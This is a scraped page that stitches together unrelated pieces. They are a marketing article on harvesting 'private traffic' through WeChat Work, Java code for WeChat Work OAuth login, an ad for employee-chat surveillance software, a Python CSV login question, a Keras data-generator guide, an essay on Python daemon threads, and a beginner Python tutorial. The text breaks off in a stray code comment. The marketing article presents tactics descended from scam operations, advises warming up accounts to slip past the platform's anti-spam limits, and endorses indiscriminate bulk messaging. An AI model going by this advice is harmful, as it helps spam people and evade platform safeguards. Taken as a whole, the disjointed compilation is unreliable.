The term "private traffic" became a buzzword half a year ago; back then, if you did not drop a couple of opinions about private traffic in conversation, you seemed left behind by the times. No wonder this year's joke goes: "I treated you as a friend, but you treated me as private traffic", a sharp picture of merchants harvesting their private traffic like leeks.
The predecessors of private traffic can be traced back to grey and black-market operations, such as the "tea girl" scams and "pig-butchering" scams.
("Pig-butchering playbook", image from the internet)
Later, people gradually realized that this approach, building a persona and a carefully designed operations funnel to drive conversion, not only produced impressive GMV but could also be reused in relatively compliant business models. That gave rise to brands everyone knows, such as GSX (跟谁学) in K-12 education and the beauty brand Perfect Diary (完美日记). But in my view, the true pioneer of legitimate private traffic is Xiaomi, which kept turning users who knew nothing about it into die-hard fans, almost imperceptibly.
The essence of private traffic lies in how you account for traffic costs. Many people compute traffic cost statically over the short term, without factoring in time. Experienced operators know that the first visit is the most expensive one. Once you have brought people in through private traffic, their repeated later visits drive the marginal cost of traffic lower and lower. Through Moments, a company can keep reaching users and effectively amortize the cost of that first contact;
and in WeChat groups, prizes, group-buying, bargain-cutting and similar tactics can induce customers to forward viral content into their Moments or other groups, further amplifying the effect and bringing in more traffic. This kind of fission, people bringing in people, also spreads out the customer-acquisition cost.
The most interesting part is that private traffic is a friend of time: run it intelligently over the long term and you can shape users' minds, gradually converting them and even winning repeat purchases. If the traffic pool is a big pie, private traffic keeps nibbling away at it, and people doing public traffic will certainly feel the pressure from those doing private traffic. Traffic thinking is outdated; user thinking is king.
Only after understanding this can you see why, in this upgrade, WeChat Work targeted the two most important battlegrounds of private traffic: Moments and group chats.
2. Over 90% of merchants overlook that WeChat Work accounts need to be warmed up
Right now, many people trying to drive traffic with WeChat Work get stuck at the very first step: adding contacts.
First, understand that even a verified WeChat Work account does not mean you can add customers in bulk without restraint. Like any Tencent product, WeChat Work is very restrained; the product has many undisclosed limits, and improper operation can get an enterprise account restricted from adding contacts, frozen, or even banned.
Adding contacts comes in two forms: you actively adding customers, and customers adding you.
(1) Scan the customer's QR code to add them.
(2) Import your personal WeChat contacts and add from there.
(3) Search by phone number and add.
(4) Use our tool to import contacts from Excel, and then add people from the phone's address book; the tool is at: see the tool link
A verified WeChat Work organization can have 2,000 staff accounts. With a new account, after a staff account adds roughly 60 customers in a row it typically becomes unable to add more. This shows that WeChat Work accounts follow the same logic as personal WeChat accounts: each account has a weight and needs to be warmed up.
I suggest warming up accounts along two dimensions: account attributes and account behaviour.
Account attributes first:
(1) The company should complete entity verification and WeChat Work verification;
(2) Employees should complete real-name verification; you may be prompted to verify ID numbers and facial information, and this must be done.
(3) Check whether the personal WeChat account bound to the WeChat Work account is a normal account, with no previous violations, and so on.
After going through WeChat Work's "personal verification + enterprise verification", not only does your account carry more weight, but customers can also see your verified information on their end, which is far more credible than a typical WeChat reseller.
As for account behaviour, you can warm up accounts like this:
First, treat WeChat Work as a normal internal chat tool, replacing DingTalk: employees should actually chat with each other, send files back and forth, and occasionally send red packets.
Then use other positive behaviours to warm up the accounts. After half a year of practice we found one trick: use WeChat Work in place of your customer-service system for a while first; by the time you start adding people, the account weight is already high.
For example, we put a "contact support" entry at the bottom of the official site with a WeChat Work QR code, so users can reach us easily. In practice, warming up accounts through this kind of WeChat interaction with customers is more efficient and accumulates weight faster.
This method has another benefit: our goal with WeChat Work is to add more people anyway, and compared with users from other channels, there is probably no audience more precisely targeted than people who come to you with questions.
Passively adding people can also hit bottlenecks, but fortunately the platform built a "live QR code" feature: when customers scan our live code they are randomly assigned to different support or sales staff, which keeps the workload fair across employees and avoids any single account hitting its daily limit for new contacts.
At the same time, some of WeChat's rules may cause a recommendation for your WeChat Work account to appear in your personal WeChat friends' contact lists.
3. Bulk messaging plus official accounts is an operations power tool
Besides one-on-one chats between staff accounts and customers, WeChat Work also officially provides a bulk-messaging interface, with four chances per month to reach each user, in formats including plain text, image-and-text, links, and mini programs.
There are two ways to operate this feature.
The first is the officially encouraged personalized bulk send: use the user-tagging features in the admin console to manually group users and deliver messages to those likely to be interested, i.e. refined operations.
For example, suppose you choose Zhihu as an acquisition channel, answer a question about "how to do makeup", and attach a personalized WeChat Work QR code. When users add you through that code, the system automatically tags them with "makeup", and those tags can be used later for personalized marketing.
The second approach is to treat WeChat Work like a service account and broadcast indiscriminately. For the same kind of broadcast, WeChat Work is clearly the superior tool compared with a service account.
Let's compare: growing followers by writing articles on a service account, versus simply adding people on WeChat Work and then sending them articles.
First, from the customer's point of view, the way both kinds of messages arrive on personal WeChat is the same: strong notifications, four sends a month. In other words, WeChat Work is effectively a kind of official account as well.
Now compare how hard it is to grow the audience. Given today's official-account environment and most people's talent, gaining 100 followers a day by writing articles takes enormous effort. WeChat Work is different: a single company can have 2,000 staff accounts, each of which can add up to 250,000 contacts, so for a company with even modest operations capability, adding thousands or tens of thousands of new customers per day is not hard at all. When we bulk-sent an image-and-text message to users via WeChat Work, the reply rate was as high as 60%, far above a typical official account.
You can imagine that, today and in the future, achieving the same marketing effect through an official account versus WeChat Work carries very different cost and difficulty. WeChat Work effectively unifies personal messaging and official accounts, and is better at exploiting the advantages of private traffic.
However, indiscriminate broadcasting on WeChat Work inevitably runs into the problem of imprecise targeting; users will feel disturbed and delete your WeChat Work contact, the equivalent of hitting "unfollow" on an official account.
4. Tricks you may not know in "Customer Contact"
Besides the bulk-send tool, WeChat Work also ships several powerful customer-contact tools in the admin console, which enable many interesting tactics.
The [Welcome message] feature in the WeChat Work console is worth trying.
[Employee departure]. When an employee leaves, WeChat Work supports transferring the customers they handled to other staff accounts, retaining the company's customer assets while keeping service to those customers continuous.
There is a pitfall here: when an employee leaves, the old customers they served receive a notification asking whether they accept being served by someone else. Inevitably some customers are lost at this point, and nobody is sure when WeChat Work will fix this.
Our suggestion is therefore: if the company has a large sales or support team, the best solution is to serve customers directly from shared company accounts, letting a rotating cast of employees use accounts that stay fixed.
[Sidebar]. This is a rather interesting module: a company can put frequently used customer-service information into pages and add them to the sidebar, forming a one-click CRM, for example customer details, product lists, order history, canned replies, and so on. The sidebar is synchronized between PC and mobile, and many efficiency tricks can be built on it.
[Vertical industry solutions]. Beyond the general modules, WeChat Work also provides tailored solutions for particular industries.
(1) Finance. The finance industry has regulatory and compliance requirements and needs quality checks on customer conversations, so the platform provides conversation archiving.
(2) Education. WeChat Work provides home-school communication tools so teachers and parents can reach each other efficiently while protecting personal privacy.
(3) Hospitals. An emergency-notification feature lets patients reach doctors immediately.
Beyond these, never overlook the synergy between WeChat Work and mini programs when running operations. The mini-program ecosystem used to struggle with retention precisely because recalling users to a mini program is hard; merchants who did well with mini programs generally borrowed the recall power of WeChat groups.
Now WeChat Work offers a better option: after a shop assistant adds a user as a WeChat contact via WeChat Work, they can send mini-program cards embedding product introductions, trial experiences and so on to plant the seed; if the user is interested after opening one, they can place an order with one tap.
I think the real potential of WeChat Work is that it further connects online and offline, which is probably also where WeChat will invest heavily in the future.
With WeChat Work, once a merchant and a customer are contacts, the merchant can serve the customer across time and space. In its official livestream, WeChat Work cited the example of the Rainbow (Tianhong) department store: over the past year, after shop assistants added customers via WeChat Work and kept reaching them through Moments ads, they increased the stickiness of existing customers and also grew "after-closing sales"; these sales outside business hours accounted for 16% of Rainbow's annual revenue.
Even better, the user experience is also better than before, a genuine win-win:
"Mother-and-baby stores: after earning the customer's trust during in-store service, staff invite the customer to add them on WeChat Work, share relevant knowledge day to day and recommend products, raising repurchase rates;
Insurance: buying insurance requires long-term communication; if an agent leaves, customer resources can be handed back to the company, and the new agent can learn the customer's needs from the chat history and keep following up until the deal closes;
Online education: every study group the company sets up is a class, and the group owner (administrator) can use the education-vertical solution to teach, send notices, assign homework, and so on."
5. Other thoughts on WeChat Work
The ambition behind this WeChat Work upgrade may not be DingTalk at all, but rather a clever strategic move aimed at grabbing a share of the future "new retail" market.
Alibaba excels at integrating resources; Tencent excels at using product strength to penetrate many scenarios. As a leader in online payments, Tencent is aiming at new retail, the area its powerful competitor Alibaba is best at. While Alibaba keeps integrating channels and acquiring offline malls, supermarkets, chain stores and mom-and-pop shops at scale, Tencent is strengthening its product and relying on the traffic advantage of 1.1 billion WeChat users to merge offline service with online. If all kinds of merchant and customer resources in "new retail" end up in the hands of WeChat Work, the room for imagination is enormous.
That's all for today's piece on driving traffic with WeChat Work; feel free to reach out and chat with us any time.
For how to add WeChat Work contacts in bulk, see this article: https://dh.621225.com/blog/phone?phone_name=more .
2020-09-09 10:03:10  [WeChat Work] Notes on WeChat Work development (privately deployed WeChat Work / standard WeChat Work) using a helper library
Using the helper library
1. Maven POM dependency
<!-- WeChat Work toolkit: https://mvnrepository.com/artifact/com.github.binarywang/wx-java -->
<dependency>
<groupId>com.github.binarywang</groupId>
<artifactId>weixin-java-cp</artifactId>
<version>3.9.0</version>
</dependency>
2. Add configuration to application.yml
A standard (non-private) WeChat Work deployment does not need baseApiUrl / oauth2redirectUri.
# WeChat-related settings
wechat:
  # privately deployed WeChat Work
  privatecp:
    corpId: wwxxxxxxxxxx
    baseApiUrl: http://127.0.0.1:161
    oauth2redirectUri: http://127.0.0.1:161
    # application configurations
    appConfigs:
      - agentId: 1000001
        secret: xxxxxxxxxxxxxxxxxxxxx
      - agentId: 1000002
        secret: xxxxxxxxxxxxxxxxxxxxx
3. Add the configuration properties class
package com.xxx.auth.config;
import java.util.List;
import com.xxx.auth.urils.JsonUtils;
import org.springframework.boot.context.properties.ConfigurationProperties;
import lombok.Getter;
import lombok.Setter;
/**
* @author GuanWeiMail@163.com
*/
@Getter
@Setter
@ConfigurationProperties(prefix = "wechat.privatecp")
public class WxCpPrivateProperties {
/**
* corpId of the WeChat Work enterprise account
*/
private String corpId;
/**
* 基础api域名
*/
private String baseApiUrl;
/**
* oauth2 网页授权请求域名
*/
private String oauth2redirectUri;
/**
* 应用配置集合
*/
private List<AppConfig> appConfigs;
@Getter
@Setter
public static class AppConfig {
/**
* AgentId of the WeChat Work application
*/
private Integer agentId;
/**
* Secret of the WeChat Work application
*/
private String secret;
/**
* token of the WeChat Work enterprise account
*/
private String token;
/**
* EncodingAESKey of the WeChat Work enterprise account
*/
private String aesKey;
}
@Override
public String toString() {
return JsonUtils.toJson(this);
}
}
Utility class
package com.tpln.auth.urils;
import com.fasterxml.jackson.annotation.JsonInclude.Include;
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
/**
*
* JSON utility class
* @author
*/
public class JsonUtils {
private static final ObjectMapper JSON = new ObjectMapper();
static {
JSON.setSerializationInclusion(Include.NON_NULL);
JSON.configure(SerializationFeature.INDENT_OUTPUT, Boolean.TRUE);
}
public static String toJson(Object obj) {
try {
return JSON.writeValueAsString(obj);
} catch (JsonProcessingException e) {
e.printStackTrace();
}
return null;
}
}
4. Add the configuration class
A standard (non-private) WeChat Work deployment does not need baseApiUrl / oauth2redirectUri.
package com.xxx.auth.config;
import java.util.Map;
import java.util.stream.Collectors;
import javax.annotation.PostConstruct;
import me.chanjar.weixin.cp.config.impl.WxCpDefaultConfigImpl;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.context.properties.EnableConfigurationProperties;
import org.springframework.context.annotation.Configuration;
import com.google.common.collect.Maps;
import lombok.val;
import me.chanjar.weixin.cp.api.WxCpService;
import me.chanjar.weixin.cp.api.impl.WxCpServiceImpl;
import me.chanjar.weixin.cp.message.WxCpMessageRouter;
/**
* @Title: configuration class for privately deployed WeChat Work
* @Description: integrates WeChat Work authentication
* @Version: v1.0
* @Author: Mr.Guan
* @Mail GuanWeiMail@163.com
* @DateTime: 2020-09-08 20:01:04
* @Package com.xxx.auth.config
*/
@Configuration
@EnableConfigurationProperties(WxCpPrivateProperties.class)
public class WxCpPrivateConfiguration {
/**
* configuration properties
*/
private WxCpPrivateProperties properties;
private static Map<Integer, WxCpMessageRouter> routers = Maps.newHashMap();
private static Map<Integer, WxCpService> cpServices = Maps.newHashMap();
@Autowired
public WxCpPrivateConfiguration(WxCpPrivateProperties properties) {
this.properties = properties;
}
public static Map<Integer, WxCpMessageRouter> getRouters() {
return routers;
}
public static WxCpService getCpService(Integer agentId) {
return cpServices.get(agentId);
}
/**
* Initialize the services
* Initializes one service per configured enterprise application
*/
@PostConstruct
public void initServices() {
cpServices = this.properties.getAppConfigs().stream().map(appConfig -> {
val configStorage = new WxCpDefaultConfigImpl();
//a standard WeChat Work deployment does not need baseApiUrl / oauth2redirectUri
configStorage.setBaseApiUrl(this.properties.getBaseApiUrl());
configStorage.setOauth2redirectUri(this.properties.getOauth2redirectUri());
configStorage.setCorpId(this.properties.getCorpId());
configStorage.setAgentId(appConfig.getAgentId());
configStorage.setCorpSecret(appConfig.getSecret());
configStorage.setToken(appConfig.getToken());
configStorage.setAesKey(appConfig.getAesKey());
val service = new WxCpServiceImpl();
service.setWxCpConfigStorage(configStorage);
routers.put(appConfig.getAgentId(), this.newRouter(service));
return service;
}).collect(Collectors.toMap(service -> service.getWxCpConfigStorage().getAgentId(), a -> a));
}
private WxCpMessageRouter newRouter(WxCpService wxCpService) {
final val newRouter = new WxCpMessageRouter(wxCpService);
return newRouter;
}
}
5. Web authorization URL
http://127.0.0.1:161/connect/oauth2/authorize?appid=wwxxxxxxxxxx&redirect_uri=http://服务器ip:8889/auth/callback/WECHAT_ENTERPRISE&response_type=code&scope=SCOPE&agentid=1000001&state=STATE#wechat_redirect
Reference
package com.xxx.auth.controller;
import cn.hutool.core.util.StrUtil;
import cn.hutool.json.JSONUtil;
import com.xxx.auth.config.WxCpPrivateConfiguration;
import com.xxx.auth.emnu.SourceInfoEnum;
import me.chanjar.weixin.cp.api.WxCpService;
import me.chanjar.weixin.cp.bean.WxCpOauth2UserInfo;
import me.chanjar.weixin.cp.bean.WxCpUser;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import javax.servlet.http.HttpServletRequest;
import java.util.Map;
/**
* @Title: authentication controller
* @Description: description
* @Version: v1.0
* @Author: Mr.Guan
* @Mail GuanWeiMail@163.com
* @DateTime: 2020-08-24 20:01:04
*/
@RestController
@RequestMapping("auth")
public class AuthController {
public static void main(String[] args) {
System.out.println(SourceInfoEnum.valueOf("WECHAT_ENTERPRISE"));
}
/**
* The authorization callback address configured on the auth platform.
* Taking this project as an example, the callback address when creating the "WeChat Work" authorization app should be: http://127.0.0.1:8443/auth/callback/wechat_enterprise?callback=
* WeChat Work login-free access:
* fetch the enterprise user's info, link it to a subsystem user, and log them in without a password
* @param request
* @param source request source; WECHAT_ENTERPRISE means WeChat Work
* @return
* @throws Exception
*/
@RequestMapping("callback/{source}")
public Object login(HttpServletRequest request, @PathVariable("source") String source) throws Exception{
//get the request parameters
Map<String, String[]> parameterMap = request.getParameterMap();
System.out.println(JSONUtil.parse(parameterMap).toStringPretty());
if(StrUtil.isBlank(source)){
return "error";
}
switch (SourceInfoEnum.valueOf(source)){
// WeChat Work
case WECHAT_ENTERPRISE:
String code = parameterMap.get("code")[0];
//get the WeChat Work service
WxCpService wxCpService = WxCpPrivateConfiguration.getCpService(1000001);
//get the user ID
WxCpOauth2UserInfo userInfo = wxCpService.getOauth2Service().getUserInfo(code);
System.out.println(JSONUtil.parse(userInfo).toStringPretty());
//fetch the contact directory
// List<WxCpDepart> list = wxCpService.getDepartmentService().list(1L);
// for (WxCpDepart wxCpDepart : list) {
// List<WxCpUser> wxCpUsers = wxCpService.getUserService().listByDepartment(wxCpDepart.getId(), false, 0);
// System.out.println(JSONUtil.parse(wxCpDepart).toStringPretty());
// System.out.println(JSONUtil.parse(wxCpUsers).toStringPretty());
// }
//get the user's detailed info
WxCpUser byId = wxCpService.getUserService().getById(userInfo.getUserId());
System.out.println(byId);
//check whether this user exists in the subsystem; if so, log them in directly and store a token in the session / redis
//if not, create the user
break;
default:
break;
}
return "ok";
}
}
2020-10-21 14:17:25  WeChat Work SCRM system deployment, secondary development, and standalone source-code pricing
WeChat Work SCRM system deployment / secondary development / standalone source-code pricing
Dianqu Interactive (点趣互动) is a third-party application vendor for WeChat Work, providing system software for managing employees' WeChat Work accounts. The Dianqu SCRM software has three main functions:
1. Conversation archiving: the SCRM system can permanently retain employees' WeChat Work conversations, including text, voice, and images, and the boss can review the chat content in the back end at any time.
2. Risk alerts: after enabling the SCRM system, sensitive words or operations can be configured in the back end; if an employee does something non-compliant on WeChat Work, the system immediately raises an alert to avert the risk.
3. Customer management: the SCRM manages the customer information on employees' WeChat Work accounts; if an employee privately adds a customer to their personal WeChat or forwards a customer's contact card to someone else, the system flags the operation to prevent the loss of customer resources.
The Dianqu WeChat Work SCRM system supports independent deployment, source-code buyout, and other forms of cooperation.
|
Python: printing a message at the end of iterating over a CSV file
I have a CSV file containing information, and the code goes through each row of the CSV file; if the username entered matches the value in the row, it lets the user log in.
However, I'm not sure how to let my program say when their details are not correct. The "not found" gets printed after every iteration rather than at the end of the CSV file.
How can I make it so that, once the for loop reaches the end, it reports that the details were not found?
Thanks.
username = str(input("Enter your username: "))
password = str(input("Enter your password: "))
file = open("details.csv","r")
print('Details opened')
contents = csv.reader(file)
print('reader established')
for row in contents:
    print('begin loop')
    if username == row[4]:
        print("Username found")
        if password == row[3]:
            print("Password found")
            main()
    else:
        print("not found")
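One common way to get the behaviour the question asks for (a suggested sketch, not code from the original post) is Python's for/else clause: the else block runs only if the loop finished without hitting break:

for row in contents:
    if username == row[4] and password == row[3]:
        print("Username and password found")
        main()
        break
else:
    # reached only when no row matched, i.e. the loop never hit break
    print("not found")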
|
Good organization is key to the performance of our engineering team, and there are some best practices for organizing the training and validation data of an ML algorithm. Using the ImageDataGenerator class from Keras gives us an easy way to organize a dataset, and maintaining this structure from our in-house tagging through CI/CD and release gives us a shorter release cycle with fewer bugs. The generator's flow_from_directory method will automatically label the images for us based on the directory they live in, removing a coding step.
File Structure
Firstly, start by understanding the file structure. The root directory /images, as an example, could be a Kaggle archive you have unzipped containing the images you want to train on. Each class should sit in its own subdirectory (for example /images/cats and /images/dogs), since flow_from_directory infers labels from the folder names.
Training Image Generator
The image generator can perform some manipulations on the fly; this makes it handy to play around with some alternative options without preprocessing an entire training set. Here, we will normalize via rescale and change the dimensions via target_size.
from tensorflow.keras.preprocessing.image import ImageDataGenerator

train_datagen = ImageDataGenerator(rescale=1.0/255)
training_dir = '/tmp/images'
train_generator = train_datagen.flow_from_directory(
    training_dir,
    target_size=(120, 120),
    batch_size=20,
    class_mode='binary'
)
Validation Image Generator
Similarly to the aforementioned training generator, we can create a generator for our validation set
test_datagen = ImageDataGenerator(rescale=1.0/255)
validation_generator = test_datagen.flow_from_directory(
    validation_dir,
    target_size=(120, 120),
    batch_size=20,
    class_mode='binary'
)
And go ahead and train like usual, but using the generators instead
model.fit(
    train_generator,
    validation_data=validation_generator,
    steps_per_epoch=100,
    epochs=15,
    validation_steps=50,
    verbose=2
)
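Because the generator applies its manipulations on the fly, it is also a convenient place to add data augmentation. A hedged sketch (the specific augmentation values below are illustrative, not from the original text):

augmented_datagen = ImageDataGenerator(
    rescale=1.0/255,
    rotation_range=40,        # random rotations of up to 40 degrees
    width_shift_range=0.2,    # random horizontal shifts
    height_shift_range=0.2,   # random vertical shifts
    zoom_range=0.2,           # random zooms
    horizontal_flip=True      # random horizontal flips
)
train_generator = augmented_datagen.flow_from_directory(
    training_dir,
    target_size=(120, 120),
    batch_size=20,
    class_mode='binary'
)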
|
"daemon thread" 是一个困扰了我很久的概念。官方文档是这么说的:
A thread can be flagged as a “daemon thread”. The significance of this flag is that the entire Python program exits when only daemon threads are left.
However, the documentation does not explain where this concept came from. For example, why did I never hear of it in my operating systems course? Below is what I found after some searching.
History
Daemon (daemon process)
In computing, a daemon, or daemon process, usually refers to a program that runs in the background. Here is a short and clear explanation:
"Daemon (Daemon Process)" is a notion in UNIX denoting a process detached from any controlling terminal, typically waiting for some event to occur and to respond to in some way. Windows services are similar but I assume Bil et alia chose deliberately a different word for them.
The daemons you commonly see are that pile of "xxxd" programs on Linux. To avoid ambiguity, the rest of this post calls these daemon processes.
Daemon threads have little to do with daemon processes
True, their main thing in common is the word "daemon". But it would also be wrong to say there is no connection at all: generally, a thread flagged as daemon is expected to run in the background for a long time (sending heartbeat packets, checking for unread messages, and so on) and does not interact with the user directly, which is similar to a daemon process.
Python's daemon threads come from Java
If you google "daemon thread", the whole first page is about Java. That seemed odd to me, so I dug out the very first commit of threading.py, whose first two lines read:
# threading.py:
# Proposed new threading module, emulating a subset of Java's threading model
Back when I read the source of concurrent.futures I was still wondering whether copying Java's API wholesale was really a good idea; it turns out Guido had already "defected" as early as 1998...
The Java documentation puts it this way:
Every thread has a priority. Threads with higher priority are executed in preference to threads with lower priority. Each thread may or may not also be marked as a daemon. When code running in some thread creates a new Thread object, the new thread has its priority initially set equal to the priority of the creating thread, and is a daemon thread if and only if the creating thread is a daemon.
When a Java Virtual Machine starts up, there is usually a single non-daemon thread (which typically calls the method named main of some designated class). The Java Virtual Machine continues to execute threads until either of the following occurs:
* The exit method of class Runtime has been called and the security manager has permitted the exit operation to take place.
* All threads that are not daemon threads have died, either by returning from the call to the run method or by throwing an exception that propagates beyond the run method.
Yep, basically the same idea.
Usage
The behaviour of daemon threads is easy to verify, so I won't go into detail.
import threading
import os
import time

def func():
    time.sleep(5)
    print("finish")

threading.Thread(target=func).start()
threading.Thread(target=func, daemon=True).start()
print("aaa")
A more meaningful question is: why did Java/Python introduce daemon threads in the first place, and what are they good for? Fortunately, someone has already explained:
Some threads do background tasks, like sending keepalive packets, or performing periodic garbage collection, or whatever. These are only useful when the main program is running, and it's okay to kill them off once the other, non-daemon, threads have exited.
Without daemon threads, you'd have to keep track of them, and tell them to exit, before your program can completely quit. By setting them as daemon threads, you can let them run and forget about them, and when your program quits, any daemon threads are killed automatically.
Put simply, daemon threads did not exist originally; the concept was invented to make programmers' lives easier, so that they do not have to track and manage all those background threads. Its only effect is that a thread marked as daemon exits together with the main program. There are three key points:
background task
only useful when the main program is running
ok to kill
A thread that gets marked as daemon should satisfy all three. The first point deserves a note: if, say, a thread is going to be joined with join(), then marking it as daemon is meaningless, because the program always has to wait for it to finish before it can continue anyway.
Daemon process
As mentioned above, Python's daemon concept was copied from Java, but Guido did not stop there: he generalized it to multiple processes. When creating a new process with multiprocessing, you can also set the daemon attribute.
Python has many ways of creating new processes, and not all of them can be made daemon processes. A few examples (a short sketch follows this list):
multiprocessing.Process: the daemon flag can be set
os.system: cannot be a daemon, because the call blocks the current program and therefore fails the "background task" criterion
subprocess.Popen: cannot be a daemon, because Popen launches an external program and therefore fails "only useful when the main program is running"
concurrent.futures.ProcessPoolExecutor: worker processes are daemonic by default
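A minimal sketch of the multiprocessing case (the heartbeat function here is made up for illustration):

import time
from multiprocessing import Process

def heartbeat():
    while True:
        print("beat")
        time.sleep(1)

if __name__ == "__main__":
    p = Process(target=heartbeat, daemon=True)
    p.start()
    time.sleep(3)   # the daemon process is terminated automatically when the main process exits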
How daemon threads are implemented
Finally, let's look at how daemon threads are implemented; it is actually very simple. The analysis below uses the very first commit of threading.py.
_sys.exitfunc = self.__exitfunc
_sys is just sys. sys.exitfunc has since been replaced by atexit, but both serve the same purpose: running cleanup actions when the program exits. So what is __exitfunc?
def __exitfunc(self):
    self._Thread__stop()
    t = _pickSomeNonDaemonThread()
    if t:
        if __debug__:
            self._note("%s: waiting for other threads", self)
        while t:
            t.join()
            t = _pickSomeNonDaemonThread()
    if self.__oldexitfunc:
        if __debug__:
            self._note("%s: calling exit handler", self)
        self.__oldexitfunc()
    if __debug__:
        self._note("%s: exiting", self)
    self._Thread__delete()
First it calls the __stop method of the base Thread class. The key part comes next:
First, t = _pickSomeNonDaemonThread(), as its name suggests, returns a non-daemon thread. _pickSomeNonDaemonThread simply walks the two dictionaries that hold the created and the still-being-created threads, checks each thread's daemon attribute, and returns the thread if it is non-daemon.
Anyone can tell what these three lines are doing:
while t:
    t.join()
    t = _pickSomeNonDaemonThread()
So once all the non-daemon threads have finished running, the main thread exits.
|
A Python Tutorial, the Basics
A very easy Python Tutorial!
#Tutorial Jam
@elipie's jam p i n g
p i n g
Here is a basic tutorial for Python, for beginners!
Table of Contents:
1. The developer of python
2. Comments/Hashtags
3. Print and input statements
f' strings
4. If, Elif, Else statements
5. Common Modules
1. Developer of Python
Python was created in the late 1980s by Guido van Rossum in the Netherlands. It was made as a successor to the ABC language, capable of interfacing with the Amoeba operating system. Its name is Python because, while he was thinking about the language, he was also reading 'Monty Python's Flying Circus'. Guido van Rossum thought that the language would need a short, unique name, so he chose Python.
For more about Guido van Rossum, click here
2. Comments/Hashtags
Comments are side notes you can write in python. They can be used, as I said before:
sidenotes
instructions or steps
etc.
How to write comments:
#This is a comment
The output is nothing because:
It is a comment and comments are invisible to the computer
Comments are not printed in Python
So just to make sure: hashtags are used to make comments. And remember, comments are ignored by the computer.
3. Print and Input statements
1. Print Statements
Print statements, printed as print, are statements used to print sentences or words. So for example:
print("Hello World!")
The output would be:
Hello World!
So you can see that the print statement is used to print words or sentences.
2. Input Statements
Input statements, printed as input, are statements used to 'ask'. For example:
input("What is your name?")
The output would be:
What is your name?
However, with inputs, you can write in them. You can also 'name' the input. Like this:
name = input("What is your name?")
You could respond by doing this:
What is your name? JBYT27
So pretty much, inputs are used to store a value that you can use later.
Then you could add a if statement, but lets discuss that later.
3. f strings
f-strings, written with an f before the opening quotation mark, are used to print or insert a value that has already been defined. So what I mean is, say I put an f-string in a print statement. Like this:
print(f"")
The output right now, is nothing. You didn't print anything. But say you add this:
print(f"Hello {name}!")
It would work, but only if name has been defined. In other words, say you had an input before and you did this with it:
name = input()
Then the f string would work. Say for the input, you put in your name. Then when the print statement would print:
Hello (whatever your name was)!
Another way you could do this is with commas. This won't use an f-string, but the result is similar. So here is how you would print it:
name = input()
...
print("Hello ", name, "!")
The output would be the same as well! The commas separate the strings and insert the name in between. But JBYT27, why not a plus sign? Well, a plus sign also works when name is a string (that's concatenation), but it raises an error if you try to add a string to something that isn't a string, while commas let print handle any type for you.
Really, the only time you would use this is to give back your name, or to check whether one value is equal to another, which we'll learn in a sec.
4. If, Elif, Else Statements
1. If Statements
If statements, written as if, are literally what they are called: if sentences. They check whether a condition holds, and if it does, an effect happens. You can think of an if statement as cause and effect. An example of an if statement is:
name = input("What is your name?")
#asking for name
if name == "JBYT27":
print("Hello Administrator!")
The output could be:
What is your name? JBYT27
Hello Administrator!
However, say it isn't JBYT27. This is where the else, elif, try, and except statements come in!
2. Elif Statements
Elif statements, written as elif, are pretty much if statements; it's just that the words else and if are combined. So say you wanted to add more conditions. Then you would do this:
if name == "JBYT27":
print("Hello Administrator!")
elif name == "Code":
print("Hello Code!")
It's just adding more if statements, just adding a else to it!
3. Else Statements
Else statements, written as else, go together with if and elif statements. They tell the computer that if something matches neither of the previous conditions, it should go to this other result. You can use it like this (following on from the code above):
if name == "JBYT27":
print("Hello admin!")
elif name == "Squid":
print("Hello Lord Squod!")
else:
print(f"Hello {name}!")
5. Common Modules
Common modules include:
os
time
math
sys
replit
turtle
tkinter
random
etc.
So all these modules that I listed, i'll tell you how to use, step by step! ;) But wait, what are modules?
Modules are like packages that come pre-installed with Python; you just have to import the one you want (please correct me if I'm wrong). So take this code:
import os
...
When you do this, you successfully import the os module! But wait, what can you do with it? The most common way people use the os module is to clear the page. That is, it clears the console (the black part), so it makes your screen clearer. But, since there are many, many, many modules, you can also clear the screen using the replit module. The code is like this:
import replit
...
replit.clear()
But one amazing thing about this importing is you can make things specific. Like say you only want to import pi and sqrt from the math package. This is the code:
from math import pi, sqrt
Let me mention that when you do this, never, ever add an and. Like from ... import ... and .... That is just horrible and stupid and... Just don't do it :)
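As a quick made-up example of using what we just imported:

from math import pi, sqrt

print(sqrt(16))      # 4.0
print(2 * pi * 3)    # circumference of a circle with radius 3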
Next is the time module
You can use the time module for:
time delay
scroll text
And yeah, that's pretty much it (I think)
Note:
All of the import syntax is the same except for the names
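Before moving on, here's what those two time-module uses look like in code (a small sketch; the message text is just an example):
import time

time.sleep(1)  # time delay: pause the program for 1 second

for letter in "Hello!":
    print(letter, end="", flush=True)  # "scroll" text by printing one character at a time
    time.sleep(0.1)                    # short pause between characters
print()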
Next are tkinter and turtle
You can use the tkinter module for GUIs (graphical interfaces); you can import it in a normal Python file, or use it in a new repl.
You can use turtle for drawing; it isn't used much for web development though.
The math and sys
The math module is used for math calculations. The sys module is used for accessing variables and functions used or maintained by the interpreter. I don't really know how I could explain it better, but for more, click here
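A quick sketch of both (the sys part just reads the arguments the script was started with and then stops the program):
import math
import sys

print(math.pi)        # 3.141592653589793
print(math.sqrt(16))  # 4.0

print(sys.argv)       # the list of command line arguments
sys.exit(0)           # stop the program with exit code 0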
Random
The random module is used for making random choices and random numbers. Say you wanted to pick a random item from a list. Here would be the code:
import random
...
a_list = ["JBYT27","pie","cat","dog"]
...
random.choice(a_list)
The result would be a random choice from the list (print it to see it). So it could be pie, JBYT27, cat, or dog. From the random module, there are many things you can import, but the most common are (see the sketch after this list):
choice
randrange
etc.
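For example, randrange gives you a random whole number from a range (a small sketch):
import random

print(random.randrange(1, 7))                          # random integer from 1 to 6, like rolling a die
print(random.choice(["JBYT27", "pie", "cat", "dog"]))  # random item from the list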
And that's all for modules. If you want links, click below.
Links for modules:
And that's it!
Hooray! We made it through without sleeping!
Credits to:
Many coders for tutorials
Books and websites
replit
etc.
Links:
Web links: ranging from a few days or hours, if you like reading
Video links: ranging from 1-12 hours, if you don't like reading
Otherwise: ranging from 5 hours to a few days, replit tutorial links
I hope you enjoyed this tutorial! I'll cya on the next post!
stay safe!
|
Awesome tutorial, many thanks. But I have one doubt, can you help me?
self.z2_error = self.o_delta.dot(self.W2.T)               # z2 error: how much our hidden layer weights contributed to output error
